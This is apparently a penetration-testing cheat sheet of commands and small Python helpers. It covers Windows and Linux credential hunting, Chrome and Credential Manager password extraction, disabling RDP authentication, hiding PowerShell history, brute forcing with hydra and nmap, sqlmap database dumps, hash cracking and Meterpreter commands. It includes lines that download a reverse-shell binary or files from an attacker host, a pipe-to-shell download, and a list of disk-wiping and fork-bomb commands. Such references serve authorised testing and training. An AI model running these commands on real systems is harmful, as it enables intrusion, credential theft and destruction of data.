- Network tools
- Web Shells
- Scripts
- Commands
- Payloads with description. Here just payloads in file
- Sites
- Tools
- Privilege Escalation
- Tips
- GPTs (Agents) for Cybersecurity
- OSINT
- API
- WordPress
- JWT
- Help with Pentesting and Bug Bounty processes
- Cloud
- Active Directory
xfreerdp /dynamic-resolution +clipboard /cert:ignore /v:<TARGET_IP> /u:<USERNAME> /p:'<PASSWORD>'
xfreerdp /v:<TARGET_IP> /u:<USERNAME> /p:'<PASSWORD>' +clipboard
(Quote the password so shell metacharacters survive; /cert:ignore accepts any server certificate, fine in a lab, not elsewhere.)
- To upgrade an unstable shell: download a reverse-shell binary (FILENAME.exe, served from your machine, e.g. with python3 -m http.server <PORT>) using PowerShell, then run it:
powershell -c "Invoke-WebRequest -Uri 'http://<LOCAL_IP>:<PORT>/<FILENAME.exe>' -OutFile 'C:\Windows\Temp\<FILENAME.exe>'"
With this command, you can identify files with potentially sensitive data such as account information, credentials, configuration files, etc. based on their filename:
gci c:\ -Include *pass*.txt,*pass*.xml,*pass*.ini,*pass*.xlsx,*cred*,*vnc*,*.config*,*accounts* -File -Recurse -EA SilentlyContinue
This command looks for leftovers of unattended/sysprep installations (answer files), which often contain plain text or base64-encoded local administrator passwords:
gci c:\ -Include *sysprep.inf,*sysprep.xml,*sysprep.txt,*unattended.xml,*unattend.xml,*unattend.txt -File -Recurse -EA SilentlyContinue
With this command it is possible to find files containing a specific pattern, for example here we are looking for the "password" pattern in various text configuration files:
gci c:\ -Include *.txt,*.xml,*.config,*.conf,*.cfg,*.ini -File -Recurse -EA SilentlyContinue | Select-String -Pattern "password"
Using the following PowerShell command, you can find database connection strings (with plain text credentials) stored in various configuration files such as web.config for ASP.NET configuration, Visual Studio project files, etc.:
gci c:\ -Include *.config,*.conf,*.xml -File -Recurse -EA SilentlyContinue | Select-String -Pattern "connectionString"
With this command, you can easily find configuration files belonging to a Microsoft IIS, XAMPP, Apache, PHP, or MySQL installation:
gci c:\ -Include web.config,applicationHost.config,php.ini,httpd.conf,httpd-xampp.conf,my.ini,my.cnf -File -Recurse -EA SilentlyContinue
With the following one-liner, we can retrieve all credentials stored in Credential Manager for the current user using the CredentialManager PowerShell module (Install-Module CredentialManager first; the blobs are DPAPI-protected, so only the owning user can read them):
Get-StoredCredential | % { write-host -NoNewLine $_.username; write-host -NoNewLine ":" ; $p = [System.Runtime.InteropServices.Marshal]::SecureStringToBSTR($_.password) ; [System.Runtime.InteropServices.Marshal]::PtrToStringAuto($p); }
The following line decrypts a saved Google Chrome password. It is a fragment: $datarow is a row read from a copy of the profile's "Login Data" SQLite database (table logins, column password_value), and DPAPI unprotect only works as the user who saved it, on the same machine. Chrome 80 and later additionally wrap the value with AES-GCM (blob prefix v10/v11) under a key kept in the profile's "Local State" file, itself DPAPI-protected, so for current versions this one-liner alone is not enough:
[System.Text.Encoding]::UTF8.GetString([System.Security.Cryptography.ProtectedData]::Unprotect($datarow.password_value,$null,[System.Security.Cryptography.DataProtectionScope]::CurrentUser))
The following command will get the autologin credentials from the registry:
gp 'HKLM:\SOFTWARE\Microsoft\Windows NT\Currentversion\Winlogon' | select "Default*"
Sometimes it is useful to change the MAC address of a network interface; with PowerShell (run as administrator) this can be done without third-party utilities. "Ethernet0" is the adapter name as shown by Get-NetAdapter:
Set-NetAdapter -Name "Ethernet0" -MacAddress "00-01-18-57-1B-0D"
This trio of commands is useful when the goal is to connect with a graphical RDP session but RDP is not enabled for some reason. Disabling NLA lowers the security of the host (the session is set up before the user is authenticated), so re-enable it when done:
Allow RDP connections -
(Get-WmiObject -Class "Win32_TerminalServiceSetting" -Namespace root\cimv2\terminalservices).SetAllowTsConnections(1)
Disable NLA -
(Get-WmiObject -class "Win32_TSGeneralSetting" -Namespace root\cimv2\terminalservices -Filter "TerminalName='RDP-tcp'").SetUserAuthenticationRequired(0)
Allow RDP on the firewall -
Get-NetFirewallRule -DisplayGroup "Remote Desktop" | Set-NetFirewallRule -Enabled True
Here is a useful command to whitelist an IP address in Windows Firewall (without -Direction the rule is inbound and covers all ports):
New-NetFirewallRule -Action Allow -DisplayName "name_rule" -RemoteAddress <DESIRED_IP>
After we are done with our cases, remove the rule:
Remove-NetFirewallRule -DisplayName "name_rule"
With the following commands, we can stop the current PowerShell session from writing command history to disk (PSReadLine's ConsoleHost_history.txt). This does not touch Script Block Logging, Module Logging or transcription, which are set by policy and record commands independently (event ID 4104), so it hides history from the next interactive user, not from the SOC:
Set-PSReadlineOption -HistorySaveStyle SaveNothing
OR
Remove-Module PSReadline
Here is a simple PowerShell command to query the Security Center and determine all installed antivirus products on this computer:
Get-CimInstance -Namespace root/SecurityCenter2 -ClassName AntiVirusProduct
- Find all files in / directory (-type d for find dirs):
find / -type f
- File name search:
find / -type f | grep '<FILE_NAME>'
- Find all files with 'config' in the name, skipping the /proc pseudo-filesystem and permission errors:
find / ! -path "*/proc/*" -iname "*config*" -type f 2>/dev/null
- To stop sending the hostname to the DHCP server, edit the NetworkManager connection profile (the file name matches the connection name) and reload:
sudo nano /etc/NetworkManager/system-connections/Wired\ connection\ 1
[ipv4]
method=auto
dhcp-send-hostname=false
- To enable IP forwarding so that intercepted traffic is passed on instead of dropped (the main prerequisite for MITM, e.g. ARP spoofing):
sudo sysctl -w net.ipv4.ip_forward=1
- Transferring files (scp pushes from your machine; wget and curl pull from a web server you run, e.g. python3 -m http.server <ATTACKER_PORT>):
scp <FILE_NAME> <USERNAME>@<TARGET_HOST>:</path/to/dir/on/victim_machine>
wget http://<ATTACKER_IP>:<ATTACKER_PORT>/<FILE_NAME>
curl http://<ATTACKER_IP>:<ATTACKER_PORT>/<FILE_NAME> -o <FILE_NAME>
- Commands that must never be run on a system you care about (listed so you recognise them in scripts and "helpful" one-liners). Deletes every file the process can reach; as root that is the whole filesystem (modern GNU rm refuses a bare / without --no-preserve-root, but /* still works):
rm -rf /
- Also known as a "fork bomb": a function that starts two copies of itself forever, exhausting the process table, PIDs and memory until the system stops responding:
:(){ :|: & };:
- This command writes a new ext4 filesystem over the whole disk without any warning or confirmation. All data is lost:
mkfs.ext4 /dev/sda
- This command overwrites the whole disk with random bytes (with /dev/random it may stall for lack of entropy; /dev/urandom does the same without stalling), resulting in data loss:
dd if=/dev/random of=/dev/sda
- This command makes the root directory itself world-writable (with -R it would do so for every file), which breaks the permission model and makes several services refuse to start:
chmod 777 /
- This command tries to move every home directory onto the /dev/null device node. With more than one source mv fails ("target is not a directory"); with a single source, run as root, it replaces /dev/null with that directory entry. It does not delete data, but it does break the system:
mv /home/* /dev/null
- This command downloads a file and discards it; /dev/null is a bit bucket, so despite the scary-looking target it is harmless:
wget http://example.com/file -O /dev/null
- This command writes a new filesystem over one partition without any warning or confirmation. All data on that partition is lost:
mkfs.ext4 /dev/sda1
- This command tries to replace /etc/passwd with a symbolic link to /dev/null. Without -f it fails because the file exists; with -f no account can be resolved any more and logins break:
ln -s /dev/null /etc/passwd
- This writes the string "Hello" over the first bytes of the disk, i.e. over the boot sector and partition table, so the system no longer boots:
echo "Hello" > /dev/sda
- Such commands download a script from an untrusted source and pipe it straight into a shell; whatever the remote side serves runs with your privileges:
wget http://malicious_source -O- | sh
- This command searches for the string "password" inside all files with the extensions .xml, .ini, .txt, and .config on the current C: drive:
cd C:\ & findstr /s /p /i /n /m "password" *.xml *.ini *.txt *.config
- cd C:\ - changes to the root directory of the C: drive
- findstr - command for searching strings in files
- /s - performs a search in all subdirectories
- /p - skips files with non-printable characters
- /i - ignores case sensitivity when searching for strings
- /n - displays the line number containing the string
- /m - prints only the name of each file that contains a match (when /m is given, /n output is suppressed)
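As an added example (not from the original page), here is the same hunt as a portable script: the filename globs of the gci commands above and the content patterns of the findstr / Select-String commands, combined and run over a constructed temporary tree. The file names and contents are made up for the demo.

```python
import os
import re
import tempfile

# Filename patterns from the gci commands (Windows globs rewritten as regexes, matched
# case-insensitively): *pass*.{txt,xml,ini,xlsx}, *cred*, *vnc*, *.config*, *accounts*,
# sysprep/unattend leftovers and the well-known IIS/XAMPP/Apache/PHP/MySQL config files.
NAME_PATTERNS = [
    r".*pass.*\.(txt|xml|ini|xlsx)$", r".*cred.*", r".*vnc.*", r".*\.config.*", r".*accounts.*",
    r".*sysprep\.(inf|xml|txt)$", r".*unattend(ed)?\.(xml|txt)$",
    r"(web\.config|applicationHost\.config|php\.ini|httpd\.conf|httpd-xampp\.conf|my\.ini|my\.cnf)$",
]
NAME_RE = re.compile("^(?:" + "|".join(NAME_PATTERNS) + ")$", re.IGNORECASE)

# Content patterns and extensions from the findstr / Select-String commands.
CONTENT_EXT = {".txt", ".xml", ".config", ".conf", ".cfg", ".ini"}
CONTENT_RE = re.compile(r"password|connectionString", re.IGNORECASE)


def hunt(root):
    """Walk root; return (files matched by name, (file, line no, line) matched by content).

    Paths are relative to root with forward slashes. Unreadable files are skipped,
    the equivalent of -EA SilentlyContinue.
    """
    by_name, by_content = [], []
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            path = os.path.join(dirpath, name)
            rel = os.path.relpath(path, root).replace(os.sep, "/")
            if NAME_RE.match(name):
                by_name.append(rel)
            if os.path.splitext(name)[1].lower() in CONTENT_EXT:
                try:
                    with open(path, "r", errors="ignore") as fh:
                        for no, line in enumerate(fh, 1):
                            if CONTENT_RE.search(line):
                                by_content.append((rel, no, line.strip()))
                except OSError:
                    continue
    return sorted(by_name), sorted(by_content)


def build_sample_tree():
    """Constructed sample tree (not real data): files a hunt should and should not report."""
    root = tempfile.mkdtemp(prefix="hunt_")
    files = {
        "inetpub/wwwroot/web.config":
            '<add name="db" connectionString="Server=sql01;User Id=sa;Password=S3cret!" />\n',
        "Windows/Panther/unattend.xml": "<Password><Value>QWRtaW5QYXNz</Value></Password>\n",
        "Users/bob/Desktop/passwords.txt": "vpn: hunter2\n",   # hit by name only
        "Users/bob/notes.txt": "lunch at 12\n",                # no hit
        "Users/bob/report.docx": "not a text file\n",          # wrong extension, never opened
    }
    for rel, body in files.items():
        full = os.path.join(root, *rel.split("/"))
        os.makedirs(os.path.dirname(full), exist_ok=True)
        with open(full, "w") as fh:
            fh.write(body)
    return root


if __name__ == "__main__":
    names, hits = hunt(build_sample_tree())
    print("by name:", *names, sep="\n  ")
    print("by content:", *("%s:%d: %s" % h for h in hits), sep="\n  ")
```

Note that passwords.txt is reported by name but not by content: its line has no "password" in it, which is why the two searches complement each other.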
- dir - like ls in Linux
- tree - displays the directory structure of a path or disk graphically; tree c:\ /f | more walks through every file on the C: drive one screen at a time
- icacls - shows (and sets) the access control list of a file or directory. The resource access level:
- (CI): container inherit
- (OI): object inherit
- (IO): inherit only
- (NP): do not propagate inherit
- (I): permission inherited from parent container
- F : full access
- D : delete access
- N : no access
- M : modify access
- RX : read and execute access
- R : read-only access
- W : write-only access
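An added example (not part of the original page) that parses icacls output using the vocabulary above and flags ACEs where a broad group (Everyone, BUILTIN\Users, Authenticated Users) holds write-like rights, the classic weak-permission finding on a service binary or its folder. The sample output is constructed, not captured from a real host, and the principal names assume an English-language Windows.

```python
import re

# Inheritance flags and simple rights, as listed above (icacls output vocabulary)
INHERIT = {"OI": "object inherit", "CI": "container inherit", "IO": "inherit only",
           "NP": "do not propagate", "I": "inherited from parent"}
RIGHTS = {"F": "full", "M": "modify", "W": "write", "D": "delete",
          "RX": "read+execute", "R": "read", "N": "none"}
# Rights that let the holder change or replace the object (simple rights plus the
# specific rights icacls prints in comma lists: write data, append data, write DAC/owner).
WRITE_LIKE = {"F", "M", "W", "D", "WD", "AD", "WA", "WEA", "WDAC", "WO"}
# Principals every local user belongs to (assumption: English OS; localized names differ)
BROAD = {"Everyone", r"BUILTIN\Users", r"NT AUTHORITY\Authenticated Users",
         r"NT AUTHORITY\INTERACTIVE"}

ACE_RE = re.compile(r"^(?P<who>.+?):(?P<flags>(?:\([A-Z,]*\))+)$")


def parse_icacls(path, output):
    """Parse `icacls <path>` output into [(principal, [flag, ...])].

    icacls prints the path in front of the first ACE only; every ACE is
    'principal:(flag)(flag)...'. Summary and blank lines are skipped.
    """
    aces = []
    for line in output.splitlines():
        text = line.strip()
        if text.startswith(path):
            text = text[len(path):].strip()
        m = ACE_RE.match(text)
        if not m:
            continue
        flags = re.findall(r"\(([A-Z,]*)\)", m.group("flags"))
        aces.append((m.group("who"), flags))
    return aces


def describe(flags):
    """Expand e.g. ['OI', 'CI', 'M'] to 'object inherit, container inherit, modify'."""
    out = []
    for f in flags:
        for part in f.split(","):
            out.append(INHERIT.get(part) or RIGHTS.get(part) or part)
    return ", ".join(out)


def weak_aces(aces):
    """ACEs that grant write-like rights to a broad principal."""
    found = []
    for who, flags in aces:
        rights = {p for f in flags for p in f.split(",") if p not in INHERIT}
        if who in BROAD and rights & WRITE_LIKE:
            found.append((who, sorted(rights & WRITE_LIKE)))
    return found


# Constructed sample output of `icacls C:\Tools\svc` (not captured from a real host)
SAMPLE = r"""C:\Tools\svc BUILTIN\Administrators:(I)(OI)(CI)(F)
             NT AUTHORITY\SYSTEM:(I)(OI)(CI)(F)
             BUILTIN\Users:(I)(OI)(CI)(RX)
             Everyone:(OI)(CI)(M)
             NT AUTHORITY\Authenticated Users:(OI)(CI)(IO)(WD,AD)

Successfully processed 1 files; Failed processing 0 files
"""

if __name__ == "__main__":
    parsed = parse_icacls(r"C:\Tools\svc", SAMPLE)
    for who, flags in parsed:
        print(f"{who:40} {describe(flags)}")
    print("weak:", weak_aces(parsed))
```

The two non-inherited entries are the interesting ones: Everyone with modify, and Authenticated Users with write/append data that applies only to children (IO), i.e. anyone can drop or alter files under the folder even though the folder entry itself looks harmless.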
Checking for known vulnerabilities in the software on the server (the vulners script matches on detected versions, so -sV is required):
nmap -sV -Pn <TARGET_IP> --script=vulners.nse -p<PORT(S)>
nmap --script ssh-brute -p <SSH_PORT> <TARGET_IP> --script-args userdb=users.lst,passdb=passwords.lst
nmap -d --script ftp-brute -p <FTP_PORT> <TARGET_IP>
nmap -sV --script=mysql-empty-password <TARGET_IP>
nmap --script mysql-brute -p <MYSQL_PORT> <TARGET_IP> --script-args userdb=users.lst,passdb=passwords.lst
nmap -sV -p <PORT> --script http-enum <TARGET_IP>
P.S. If a CMS or database is found, search for "<name_of_CMS_or_DB> brute force nmap" to find the matching NSE script.
P.P.S. Full list of NMAP NSE scripts.
Categories: auth, broadcast, brute, default, discovery, dos, exploit, external, fuzzer, intrusive, malware, safe, version, vuln.
vulscan is not bundled with nmap and needs to be installed. Thanks for that, scip AG!
git clone https://github.com/scipag/vulscan.git
Or read the scip AG instructions. It's easy.
- Copy it to /usr/share/nmap/scripts/ (or another folder where you keep nmap scripts)
- Make the files readable by the user running nmap
- Run it with version detection, since vulscan matches on the detected version strings:
nmap -sV --script=vulscan/vulscan.nse <TARGET>
gobuster dir flags:
-u - target url
-w - wordlist
-s - include only responses with the specified status codes (comma-separated)
-b - exclude responses with the specified status codes (comma-separated; 404 is excluded by default)
--exclude-length - exclude responses with specific content lengths (comma-separated, supports ranges)
gobuster dir -u <TARGET_URL> -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
vhost - to enumerate virtual hosts (recent versions need --append-domain to add the base domain to each wordlist entry):
gobuster vhost -w </path/to/wordlist> -u <url>
-t - threads
gobuster dns -d <TARGET_DOMAIN> -w /usr/share/wordlists/dns/subdomains_list.txt -t 50
hydra -l <USERNAME> -P <WORDLIST> -v <TARGET_IP> <PROTOCOL>
Brute force ssh (keep the thread count low; OpenSSH drops too many parallel connections and hydra itself recommends -t 4):
hydra -L /path/to/file/user.txt -P /path/to/file/pass.txt <TARGET_IP> ssh -t 4
Brute force smb example:
hydra -L ~/path/to_file/user.txt -P ~/path/to_file/pass.txt <TARGET_IP> smb -V
Hydra can brute force usernames as well as passwords: it tries every combination from both lists. -u loops over all users for each password instead of all passwords for each user (spreads attempts across accounts, which delays lockouts); -v -V prints every login attempt:
hydra -v -V -u -L <USERNAME_LIST> -P <PASSWORD_LIST> -t 1 <TARGET_IP> <PROTOCOL>
Attack a Windows Remote Desktop with a password list (-f stops after the first valid pair):
hydra -t 1 -V -f -l <USERNAME> -P <WORDLIST> rdp://<TARGET_IP>
Craft a more specific request for Hydra to brute force. The http-form-post module takes "path:POST body with ^USER^ and ^PASS^ placeholders:condition"; S=Location means a response containing "Location" (the redirect after a successful WordPress login) counts as success:
hydra -l <USERNAME> -P <PASSWORD_LIST> <TARGET_IP> -V http-form-post '/wp-login.php:log=^USER^&pwd=^PASS^&wp-submit=Log+In&testcookie=1:S=Location'
dirsearch -e php,log,sql,txt,bak,tar,tar.gz,zip,rar,swp,gz,asp,aspx -u '<TARGET_IP>'
- Python way. pty is a standard-library module for pseudo-terminal handling; it turns a bare nc shell into a proper TTY:
python -c 'import pty;pty.spawn("/bin/bash")'
Then background the shell (Ctrl+Z) and, back in your local terminal, run:
stty raw -echo && fg
If there is no python:
/usr/bin/script -qc /bin/bash /dev/null
- Another way:
script /dev/null -c /bin/bash
Send the console to the background (Ctrl+Z), then in the local terminal type:
stty raw -echo; fg
Press Enter twice and we are back in the shell; set the terminal type so clear, vim and tab completion work:
export TERM=xterm
sqlmap -u "<TARGET_URL>" --dbs --batch
--dbs - enumerate database names
--batch - never ask for user input, take the default answer whenever a question would be asked
Once we have the database name, get its table names:
sqlmap -u "<TARGET_URL>" -D <db_name> --tables --batch
--tables - table enumeration
To get the column names of the table of interest:
sqlmap -u "<TARGET_URL>" -D <db_name> -T <table_name> --columns --batch
--columns - enumerate the table's columns
Get the data from a table:
sqlmap -u "<TARGET_URL>" -D <db_name> -T <table_name> --dump --batch
Dumps every table of the database at once (table names, columns and all rows):
sqlmap -u "<TARGET_URL>" -D <db_name> --dump --batch
To dump every database the injected user can read, use --dump-all instead of -D and --dump (slow and noisy; prefer targeted dumps on a real engagement).
john --format=raw-<hashtype> --wordlist=path/to/wordlist.txt to_crack.txt
(<hashtype> is e.g. md5, sha1, sha256; john --list=formats prints every supported format.)
There is a username and a hashed password (the line username:d776dd32d662b8efbdf853837269bd725203c579 in the file to_crack.txt). Single-crack mode derives candidates from the username itself (Username, USERNAME, UseRNAmE, username123 and so on), so it is worth trying first:
john --single --format=raw-sha1 to_crack.txt
There is a file to_crack.txt with edba955d0ea15fdef4f61726ef97e5af507430c0, for example.
The command to run John in dictionary (wordlist) mode:
john --wordlist=path/to/wordlist.txt --format=raw-sha1 to_crack.txt
Incremental mode tries character combinations exhaustively. It can run for a very long time if the password is long or mixes letters, digits and symbols:
john -i:digits passwordfile.txt
-i - tells John to use incremental mode
digits - the name of the incremental mode to use, here the predefined "Digits" mode that only tries 0-9; the length limits come from the [Incremental:Digits] section of john.conf, not from the command line
LM hashes (legacy Windows), cracked with John's default mode sequence:
john --format=lm to_crack.txt
The unshadow command combines the passwd (/etc/passwd) and shadow(/etc/shadow) files together into a single file. This can then be used by John to crack passwords.
The command will combine the files together and create an output.db file:
unshadow /etc/passwd /etc/shadow > output.db
Now crack the output.db file:
john output.db
First have to get the hash of the zip file’s password. Command will get the hash from the zip file and store it in the zip.hashes file:
zip2john file.zip > zip.hashes
Then to crack the hash:
john zip.hashes
hash.txt contains an MD5 digest: 8743b52063cd84097a65d1633f5c74f5
Use:
hashcat -m 0 -a 0 hash.txt passwordlist.txt
-m 0 - MD5 hash mode
-a 0 - dictionary (straight) attack
hash.txt - text file containing the hash in the format hashcat expects for that mode
passwordlist.txt - dictionary file containing candidate passwords in plain text
hash.txt contains md5($pass.$salt) as digest:salt: 01dfae6e5d4d90d9892622325959afbe:7050461
hashcat -m 10 -a 0 hash.txt passwordlist.txt
-m 10 - salted MD5, md5($pass.$salt) hash mode
hash.txt contains md5crypt / MD5 (Unix) / Cisco-IOS $1$ hashes
hashcat -m 500 -a 0 hash.txt passwordlist.txt
-m 500 - md5crypt hash mode
hash.txt contains HMAC-SHA1 (key = $pass) as digest:message: c898896f3f70f61bc3fb19bef222aa860e5ea717:1234
hashcat -m 150 -a 0 hash.txt passwordlist.txt
-m 150 - HMAC-SHA1 (key = $pass) hash mode
hash.txt contains a SHA1 digest: b89eaac7e61417341b710b727768294d0e6a277b
hashcat -m 100 -a 0 hash.txt passwordlist.txt
-m 100 - SHA1 hash mode
hash.txt contains a SHA2-384 digest: 07371af1ca1fca7c6941d2399f3610f1e392c56c6d73fddffe38f18c430a2817028dae1ef09ac683b62148a2c8757f42
hashcat -m 10800 -a 0 hash.txt passwordlist.txt
-m 10800 - SHA2-384 hash mode
hash.txt contains a SHA3-512 digest: 7c2dc1d743735d4e069f3bda85b1b7e9172033dfdd8cd599ca094ef8570f3930c3f2c0b7afc8d6152ce4eaad6057a2ff22e71934b3a3dd0fb55a7fc84a53144e
hashcat -m 17600 -a 0 hash.txt passwordlist.txt
-m 17600 - SHA3-512 hash mode
hash.txt contains an NTLM hash: b4b9b02e6f09a9bd760f388b67351e2b
hashcat -m 1000 -a 0 hash.txt passwordlist.txt
-m 1000 - NTLM hash mode
hash.txt contains a CRC32 checksum as checksum:salt: c762de4a:00000000
hashcat -m 11500 -a 0 hash.txt passwordlist.txt
-m 11500 - CRC32 hash mode
The exact input format for any mode is shown by hashcat --example-hashes.
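Added example, not from the page or from hashcat: what the mode numbers above actually compute, written out in Python and run as a tiny dictionary attack over the example hashes from the table (these are hashcat's published example hashes, whose plaintext is "hashcat"). md5crypt (-m 500) is left out because it needs the full crypt(3) iteration scheme; MD4 is implemented inline because NTLM needs it and OpenSSL 3 often disables it in hashlib. The wordlist is a constructed four-entry list.

```python
import hashlib
import hmac
import struct
import zlib

M32 = 0xFFFFFFFF


def _md4(data):
    """Minimal MD4 (RFC 1320). NTLM = MD4(UTF-16LE(password))."""
    F = lambda x, y, z: (x & y) | (~x & z)
    G = lambda x, y, z: (x & y) | (x & z) | (y & z)
    H = lambda x, y, z: x ^ y ^ z
    rol = lambda v, s: ((v << s) | (v >> (32 - s))) & M32
    msg = data + b"\x80"
    msg += b"\x00" * ((56 - len(msg) % 64) % 64) + struct.pack("<Q", len(data) * 8)
    a, b, c, d = 0x67452301, 0xEFCDAB89, 0x98BADCFE, 0x10325476
    for off in range(0, len(msg), 64):
        X = struct.unpack("<16I", msg[off:off + 64])
        aa, bb, cc, dd = a, b, c, d
        for i in range(16):                      # round 1
            a = rol((a + F(b, c, d) + X[i]) & M32, (3, 7, 11, 19)[i % 4])
            a, b, c, d = d, a, b, c
        for i in range(16):                      # round 2: word order 0,4,8,12,1,5,...
            k = (i % 4) * 4 + i // 4
            a = rol((a + G(b, c, d) + X[k] + 0x5A827999) & M32, (3, 5, 9, 13)[i % 4])
            a, b, c, d = d, a, b, c
        for i in range(16):                      # round 3: word order 0,8,4,12,2,10,...
            k = (0, 8, 4, 12, 2, 10, 6, 14, 1, 9, 5, 13, 3, 11, 7, 15)[i]
            a = rol((a + H(b, c, d) + X[k] + 0x6ED9EBA1) & M32, (3, 9, 11, 15)[i % 4])
            a, b, c, d = d, a, b, c
        a, b, c, d = (a + aa) & M32, (b + bb) & M32, (c + cc) & M32, (d + dd) & M32
    return struct.pack("<4I", a, b, c, d)


# hashcat mode -> hex digest of a candidate password (bytes) with the optional salt (bytes)
MODES = {
    0:     lambda pw, salt: hashlib.md5(pw).hexdigest(),
    10:    lambda pw, salt: hashlib.md5(pw + salt).hexdigest(),           # md5($pass.$salt)
    100:   lambda pw, salt: hashlib.sha1(pw).hexdigest(),
    150:   lambda pw, salt: hmac.new(pw, salt, hashlib.sha1).hexdigest(),  # key=$pass, msg=salt
    1000:  lambda pw, salt: _md4(pw.decode().encode("utf-16le")).hex(),   # NTLM
    10800: lambda pw, salt: hashlib.sha384(pw).hexdigest(),
    17600: lambda pw, salt: hashlib.sha3_512(pw).hexdigest(),
    11500: lambda pw, salt: "%08x" % zlib.crc32(pw, int(salt, 16)),       # salt = CRC start value
}


def crack(mode, hash_line, wordlist):
    """Return the wordlist entry whose hash equals hash_line ('digest' or 'digest:salt'), else None."""
    digest, _, salt = hash_line.partition(":")
    for cand in wordlist:
        if MODES[mode](cand.encode(), salt.encode()) == digest.lower():
            return cand
    return None


# Constructed hash.txt contents: the example hashes quoted in the table above, one per mode
HASHES = {
    0: "8743b52063cd84097a65d1633f5c74f5",
    10: "01dfae6e5d4d90d9892622325959afbe:7050461",
    100: "b89eaac7e61417341b710b727768294d0e6a277b",
    150: "c898896f3f70f61bc3fb19bef222aa860e5ea717:1234",
    1000: "b4b9b02e6f09a9bd760f388b67351e2b",
    10800: "07371af1ca1fca7c6941d2399f3610f1e392c56c6d73fddffe38f18c430a2817028dae1ef09ac683b62148a2c8757f42",
    17600: "7c2dc1d743735d4e069f3bda85b1b7e9172033dfdd8cd599ca094ef8570f3930c3f2c0b7afc8d6152ce4eaad6057a2ff22e71934b3a3dd0fb55a7fc84a53144e",
    11500: "c762de4a:00000000",
}
WORDLIST = ["password", "123456", "hashcat", "letmein"]   # constructed mini dictionary


def crack_all():
    return {mode: crack(mode, h, WORDLIST) for mode, h in HASHES.items()}


if __name__ == "__main__":
    for mode, pw in crack_all().items():
        print(f"-m {mode:<6} {pw}")
```

The point of the mode number is only "which function, and where does the salt go"; -a 0 is the loop in crack(). Real hashcat does the same thing billions of times per second on a GPU, which is why a salted or iterated scheme (md5crypt, bcrypt) matters far more than the choice between MD5 and SHA-3.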
- site: - returns results only for the specified domain
- intitle: - search in the page title
- inurl: - search in the URL
- related: - returns sites similar to the specified one
- ext: or filetype: - search by page extension or file type
- cache: - show Google's cached copy of the page
- intext: - search in the page body
- allintext: - every term must appear in the page body
- allinurl: - every term must appear in the URL
- More here
- AWS keys
path:**/.env AWS_ACCESS_KEY_ID
- Open DB passwords
DB_PASSWORD=
- DB dump files
path:*.sql "CREATE TABLE" AND "INSERT INTO"
- API keys
path:**/.properties api_key
- Root passwords in docker-compose
path:**/docker-compose.yml MYSQL_ROOT_PASSWORD
- Private keys
path:*.pem private
- Open secrets JWT
language:javascript jwt_secret OR jwt_key
- Open .git directories
path:**/.git/*
- Public ssh keys
path:*.pub "ssh-rsa"
- Passphrase
passphrase * path:**/.json
- Check commits and issues as well; secrets are often removed from the tree but still live in history
- Search for vulnerable code patterns with GitHub regex search (for example SQL built from $_GET, SSRF through file_get_contents/curl on $_GET, and headless Chrome launched from a shell command):
/SELECT \* FROM.*\$_GET/
/file_get_contents\(.*\$_GET|curl_exec\(.*\$_GET/
/(subprocess|exec|spawn|system).*chrome.*--headless/
-mc (match code) - include only responses that match the specified status codes (e.g. 200,204,301,400-499)
-ms (match size) - include only responses that match a specific size or range of sizes
-mw (match word count) - include only responses whose body has the specified number of words (e.g. -mw 120)
-ml (match line count) - include only responses whose body has the specified number of lines
-mt (match time) - include only responses that meet a time-to-first-byte condition, useful for spotting responses that are unusually slow or fast (e.g. ">500" for blind injection timing)
-fc (filter code) - exclude responses that match the specified status codes, same format as -mc
-fs (filter size) - exclude responses with a specific size or range of sizes
-fw (filter word count) - exclude responses with the specified number of words; the usual way to drop a "not found" page that returns 200
-fl (filter line count) - exclude responses with a specific number of lines or range of lines; for example, -fl 5 filters out responses with 5 lines
-e - file extensions to append to each word
-recursion - recurse into every directory found
ffuf -w /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt -u http://<TARGET_IP>:<TARGET_PORT>/FUZZ -e .php,.html,.txt
Two wordlists need named keywords (one FUZZ cannot refer to both); -ic ignores comment lines in the wordlists:
ffuf -w /path/to/wordlist1.txt:W1 -w /path/to/wordlist2.txt:W2 -u https://example.com/W1?param=W2 -mc 200 -ic
ffuf -w /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt -u http://<TARGET_IP>:<TARGET_PORT>/FUZZ -recursion
Virtual host discovery: fuzz the Host header and filter out the size of the default vhost's response:
ffuf -u http://<TARGET_IP> -H "Host: FUZZ.<TARGET_DOMAIN>" -w /path/to/wordlist -fs <DEFAULT_RESPONSE_SIZE>
- Download the deb package
- Install:
sudo dpkg -i rustscan_2.0.1_amd64.deb
- Use:
- Simple port scan:
rustscan -a www.<target_site.com>
- Specific port:
rustscan -a www.<target_site.com> -p 443
Or a few ports:
rustscan -a www.<target_site.com> -p 21,22,80,443
- Port detection in the range 1-1000:
rustscan -a www.<target_site.com> --range 1-1000
- masscan. It always needs an explicit port list (-p); there is no default. Scanning a single IP address:
masscan -p80,443 <target_ip>
- Scanning an IP range:
masscan -p80,443 192.168.0.0-192.168.0.255
- Scanning specific ports:
masscan -p80,443 192.168.0.1
- Scanning all ports:
masscan -p0-65535 192.168.0.1
- Setting the scan rate:
masscan -p80 192.168.0.1 --rate 10000
--rate - sets the scan rate, here 10,000 packets per second. Choose the speed for the link you are on and the target's tolerance; IMHO 500-1000 is fine for most cases.
- Saving results to a file:
masscan -p80 192.168.0.1 -oG results.txt
-oG - saves the results in grepable (nmap-style) format; -oJ and -oX give JSON and XML.
- Tracing packets: masscan has no --packet option; to print every packet it sends and receives add --packet-trace.
- masscan cannot scan through a SOCKS5 proxy, because it crafts raw packets itself. --source-ip / --source-port only set the source address and port written into those packets, and replies must be routable back to that address or nothing is received:
masscan -p80 192.168.0.1 --source-ip <source_ip> --source-port <source_port>
- arp - displays MAC and IP addresses of local devices interacted with
- cd - command to change to another directory/folder
- clearev - clears the Windows event logs (needs administrative privs)
- dir/ls - lists files and folders in the specified directory
- download - downloads files from the remote machine to the local machine
- getpid - displays the process ID under which Meterpreter is running
- getproxy - retrieves information about the system's proxy server
- getsystem - attempts to escalate privileges
- getuid - displays the current user on behalf of whom Meterpreter is running
- hashdump - dump all password hashes
- help - help, display help documentation
- idletime - displays user inactivity time on the remote computer
- ifconfig/ipconfig - displays network settings
- migrate - migrates meterpreter to another process
- netstat - displays current network connections
- ps - lists all current processes
- pwd - displays the current directory/folder
- record_mic - records audio on the remote machine
